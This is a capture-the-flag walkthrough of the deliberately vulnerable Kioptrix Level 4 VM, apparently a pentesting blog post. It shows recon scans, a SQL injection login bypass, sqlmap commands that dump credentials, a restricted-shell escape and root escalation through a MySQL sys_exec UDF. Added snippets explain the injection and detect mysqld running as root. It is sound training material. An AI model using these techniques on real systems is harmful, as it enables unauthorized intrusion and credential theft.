Part 4 of 5 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want to get the OSCP certification. The point of the game is to find a way to get a root shell on the vulnerable machine. The VM can be downloaded here. Now let's get started!
NOTE: When I extracted the VM I was only given a vmdk (virtual machine disk), which gave me problems when trying to open it with VMware. I used the guide Create Workstation Virtual Machine Using Existing Virtual Disks to help me out.
Description from author:
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:
1. It’s possible to get root remotely [ Edit: sorry not what I meant ]
1a. It’s possible to remotely compromise the machine
2. Stays within the target audience of this site
3. Must be “realistic” (well kinda…)
4. Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.
I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
I’d love to code some small custom application for people to exploit. But I’m an administrator, not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
— A few things I must say. I made this image using a new platform. Hoping everything works, but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your Fusion version.
— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason, email comms[=]kioptrix.com
Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
So I hope you enjoy this one.
The Kioptrix Team
**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**
Kali Linux machine
Scanning and Reconnaissance
Using the tool netdiscover, I found the victim VM at 192.168.182.154.
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!
root@kali:~# nmap -sS -n 192.168.182.154

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-12 19:38 CDT
Nmap scan report for 192.168.182.154
Host is up (0.00034s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:68:B2:1F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 157.82 seconds
root@kali:~#
Since ports 139/tcp and 445/tcp are open, let's enumerate SMB with enum4linux and check for open shares and usernames. enum4linux produced a lot of output; only the useful parts are shown below.
root@kali:~# enum4linux 192.168.182.154
=========================================
| OS information on 192.168.182.154 |
=========================================
[+] Got OS info for 192.168.182.154 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.182.154 from srvinfo:
 KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
 platform_id : 500
 os version : 4.9
 server type : 0x809a03

================================
| Users on 192.168.182.154 |
================================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

============================================
| Share Enumeration on 192.168.182.154 |
============================================
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

 Sharename  Type  Comment
 ---------  ----  -------
 print$     Disk  Printer Drivers
 IPC$       IPC   IPC Service (Kioptrix4 server (Samba, Ubuntu))

 Server     Comment
 ---------  -------
 KIOPTRIX4  Kioptrix4 server (Samba, Ubuntu)

 Workgroup  Master
 ---------  -------
 WORKGROUP  KIOPTRIX4

[+] Attempting to map shares on 192.168.182.154
//192.168.182.154/print$  Mapping: DENIED, Listing: N/A
//192.168.182.154/IPC$  [E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
The victim is running Samba 3.0.28a (no public exploits available) and the enumeration gave me 5 usernames. enum4linux also tried to map the shares print$ and IPC$, but access was denied. Let's try dirb against the victim's website.
root@kali:~# dirb http://192.168.182.154

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Mar 12 21:29:00 2017
URL_BASE: http://192.168.182.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.182.154/ ----
+ http://192.168.182.154/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.182.154/images/
+ http://192.168.182.154/index (CODE:200|SIZE:1255)
+ http://192.168.182.154/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.182.154/john/
+ http://192.168.182.154/logout (CODE:302|SIZE:0)
+ http://192.168.182.154/member (CODE:302|SIZE:220)
+ http://192.168.182.154/server-status (CODE:403|SIZE:335)

---- Entering directory: http://192.168.182.154/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.182.154/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Mar 12 21:29:03 2017
DOWNLOADED: 4612 - FOUND: 6
root@kali:~#
Found some useful stuff including a /john/ directory.
Checking the website, it has a login form. Let's see if it's vulnerable to SQL injection by putting a single quote
'
in the username and password fields.
Well look what we have here! It is vulnerable to SQLi!!
I will use 2 ways to get 2 sets of login credentials for the server. The first is a manual SQL injection and the second uses sqlmap. Both yield the same results; I'm pointing this out so nobody gets confused. Let's get started!
Let's try an injection using one of the usernames from the SMB enumeration. I'm going to start with john because dirb also found a john directory. I will enter john in the username field and
1' or '1'='1
in the password field. The SQL query on the back end will then look something like this:
SELECT * FROM users where username='john' and password='1' or '1'='1'
It worked!! Got john’s credentials with the password being MyNameIsJohn
Did the same method with robert and got his credentials as well with his password being ADGAdsafdfwt4gadfga==
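To show why the single-quote probe produces an error and why the 1' or '1'='1 payload logs in, here is an added example (not code from this post or from the VM) that rebuilds the login query against an in-memory SQLite table standing in for the VM's MySQL members table, beside the parameterised query the application should have used. The table contents, the function names and the use of SQLite instead of MySQL are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the "members" table sqlmap dumps later in the post;
# the passwords here are sample values, not the ones from the VM.
ROWS = [("john", "sample-pw-john"), ("robert", "sample-pw-robert")]

# The probe typed into the form above, and the payload that logged in as john.
PROBE = "'"
PAYLOAD = "1' or '1'='1"


def connect():
    """In-memory SQLite database standing in for the VM's MySQL 'members' database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)", ROWS)
    return db


def login_vulnerable(db, username, password):
    """Query built by string concatenation (the pattern behind the login above).

    The payload turns the WHERE clause into (... AND ...) OR '1'='1', which is
    true for every row because AND binds tighter than OR.
    """
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return sorted(r[0] for r in db.execute(sql))


def login_safe(db, username, password):
    """Parameterised query: the driver passes the quote as data, never as SQL syntax."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return sorted(r[0] for r in db.execute(sql, (username, password)))


def probe_raises_error(db):
    """True when a lone quote in the username field breaks the query (the SQLi tell-tale)."""
    try:
        login_vulnerable(db, PROBE, "")
    except sqlite3.Error:
        return True
    return False
```

Running the payload through login_vulnerable returns every user in the table, while login_safe returns nothing for the same input; only a real username and password pair matches in the safe version.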
Note: you can skip ahead to Escaping restricted shell to continue the pentest, or read SQLi using sqlmap for the other method I used to get the credentials.
SQLi using sqlmap
The output from the single-quote test, together with the login form's source (the form posts to checklogin.php with the fields myusername and mypassword), gives me enough information to run the injection with sqlmap.
The command below lists the databases on the server.
root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --dbs
There are 3 databases. Let's see what the members database has to offer by listing its tables with the command below.
root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --tables -D members
The members database has a single table, also called members. Let's dump it with the command below and see what we get.
root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --data="myusername=username&mypassword=password" -D members -T members --dump
BINGO!! We got 2 valid login credentials that I will use to ssh into the server.
Escaping restricted shell
root@kali:~# ssh john@192.168.182.154
john@192.168.182.154's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$
After logging in, I noticed I was in a restricted shell that only allows a few commands. Since echo is allowed, I can easily "escape" the restricted shell with the command:
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$
Once out of the restricted shell, I ran several commands to see if I could find anything interesting.
john@Kioptrix4:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
john@Kioptrix4:~$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
john@Kioptrix4:~$ ps -ef | grep root
root         1     0  0 Mar12 ?        00:00:01 /sbin/init
root         2     0  0 Mar12 ?        00:00:00 [kthreadd]
root         3     2  0 Mar12 ?        00:00:00 [migration/0]
root         4     2  0 Mar12 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Mar12 ?        00:00:00 [watchdog/0]
root         6     2  0 Mar12 ?        00:00:00 [events/0]
root         7     2  0 Mar12 ?        00:00:00 [khelper]
root        41     2  0 Mar12 ?        00:00:00 [kblockd/0]
root        44     2  0 Mar12 ?        00:00:00 [kacpid]
root        45     2  0 Mar12 ?        00:00:00 [kacpi_notify]
root       170     2  0 Mar12 ?        00:00:00 [kseriod]
root       208     2  0 Mar12 ?        00:00:00 [pdflush]
root       209     2  0 Mar12 ?        00:00:00 [pdflush]
root       210     2  0 Mar12 ?        00:00:00 [kswapd0]
root       252     2  0 Mar12 ?        00:00:00 [aio/0]
root      1468     2  0 Mar12 ?        00:00:00 [ata/0]
root      1471     2  0 Mar12 ?        00:00:00 [ata_aux]
root      1480     2  0 Mar12 ?        00:00:00 [scsi_eh_0]
root      1485     2  0 Mar12 ?        00:00:00 [scsi_eh_1]
root      1498     2  0 Mar12 ?        00:00:00 [ksuspend_usbd]
root      1503     2  0 Mar12 ?        00:00:00 [khubd]
root      2359     2  0 Mar12 ?        00:00:00 [scsi_eh_2]
root      2602     2  0 Mar12 ?        00:00:00 [kjournald]
root      2769     1  0 Mar12 ?        00:00:00 /sbin/udevd --daemon
root      3042     2  0 Mar12 ?        00:00:00 [kgameportd]
root      3212     2  0 Mar12 ?        00:00:00 [kpsmoused]
root      4501     1  0 Mar12 tty4     00:00:00 /sbin/getty 38400 tty4
root      4502     1  0 Mar12 tty5     00:00:00 /sbin/getty 38400 tty5
root      4507     1  0 Mar12 tty2     00:00:00 /sbin/getty 38400 tty2
root      4509     1  0 Mar12 tty3     00:00:00 /sbin/getty 38400 tty3
root      4518     1  0 Mar12 tty6     00:00:00 /sbin/getty 38400 tty6
root      4569     1  0 Mar12 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4590     1  0 Mar12 ?        00:00:00 /usr/sbin/sshd
root      4646     1  0 Mar12 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4688  4646  0 Mar12 ?        00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid
root      4690  4646  0 Mar12 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4763     1  0 Mar12 ?        00:00:00 /usr/sbin/nmbd -D
root      4765     1  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4779  4765  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4780     1  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4800  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4812     1  0 Mar12 ?        00:00:00 /usr/sbin/cron
root      4834     1  0 Mar12 ?        00:00:00 /usr/sbin/apache2 -k start
root      4890     1  0 Mar12 tty1     00:00:00 /sbin/getty 38400 tty1
root      4943  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4944  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      5752  4590  0 01:07 ?        00:00:00 sshd: john [priv]
john      5901  5807  0 02:26 pts/0    00:00:00 grep root
john@Kioptrix4:~$
I can see that MySQL is running with root privileges. Since I have ssh access to the machine, let's see if I can find the database credentials in the web application's files.
john@Kioptrix4:~$ ls /var/www/
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:~$
Looks like no password is needed to access the database as the MySQL root user. Because the MySQL server itself runs as root and we can connect to it as root, we can execute commands on the operating system through a User Defined Function (UDF), and that is how we will escalate our privileges to root. This requires the lib_mysqludf_sys.so library to be present on the server; using whereis, I found it was already installed.
john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$
Let's access the MySQL server. These two tutorials helped me understand MySQL UDFs: MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux, and Command execution with a MySQL UDF.
john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 98586
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.08 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john# whoami
root
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# hostname
Kioptrix4
root@Kioptrix4:/home/john#
Using sys_exec I was able to run usermod, which added john to the admin group (the group Ubuntu's default sudoers file grants sudo rights to); sudo su then gave me the root shell.
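The whole privilege escalation above hinges on one misconfiguration visible in the ps output: mysqld started with --user=root, so a UDF runs as root. As an added defender's check (not part of the original post), the Python below parses ps -ef output and flags listed daemons whose effective user is root; the sample listing is constructed from the lines above plus one correctly configured mysqld for contrast, and the EXPECTED_USERS policy table is an assumption.

```python
import re

# Constructed sample of "ps -ef" output: abridged lines from the Kioptrix4
# listing above, plus one correctly configured mysqld line for contrast.
PS_SAMPLE = """\
root      4590     1  0 Mar12 ?        00:00:00 /usr/sbin/sshd
root      4646     1  0 Mar12 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4688  4646  0 Mar12 ?        00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid
root      4834     1  0 Mar12 ?        00:00:00 /usr/sbin/apache2 -k start
mysql     9001     1  0 Mar12 ?        00:00:02 /usr/sbin/mysqld --user=mysql
"""

# Assumed policy: daemons that must run under a dedicated service account.
# apache2's parent process legitimately runs as root to bind port 80, so it is not listed.
EXPECTED_USERS = {"mysqld": "mysql"}


def parse_ps(text):
    """Return (uid, pid, cmd) tuples from ps -ef lines; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(parts) == 8 and parts[1].isdigit():
            rows.append((parts[0], int(parts[1]), parts[7]))
    return rows


def effective_user(uid, cmd):
    """mysqld switches to --user=<name> after start; otherwise the ps UID stands."""
    m = re.search(r"--user=(\S+)", cmd)
    return m.group(1) if m else uid


def find_root_daemons(text, expected=EXPECTED_USERS):
    """Flag listed daemons whose effective user is root instead of the service account."""
    findings = []
    for uid, pid, cmd in parse_ps(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in expected and effective_user(uid, cmd) == "root":
            findings.append({"pid": pid, "binary": binary, "expected": expected[binary]})
    return findings


if __name__ == "__main__":
    for f in find_root_daemons(PS_SAMPLE):
        print("pid %(pid)d: %(binary)s runs as root, expected user %(expected)s" % f)
```

On the server side the fix is the [mysqld] option user=mysql in my.cnf together with a password on the MySQL root account, which removes the MySQL-root-to-system-root path this post follows.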
This was tougher than the previous level, but when it got tough I used the university of Google for some additional help. Several exploitation steps got me access to the server, and then MySQL was used for privilege escalation to the desired root shell. If you have any questions or enjoyed the read, leave some feedback below! Well, that's it for this level. Now on to the last one!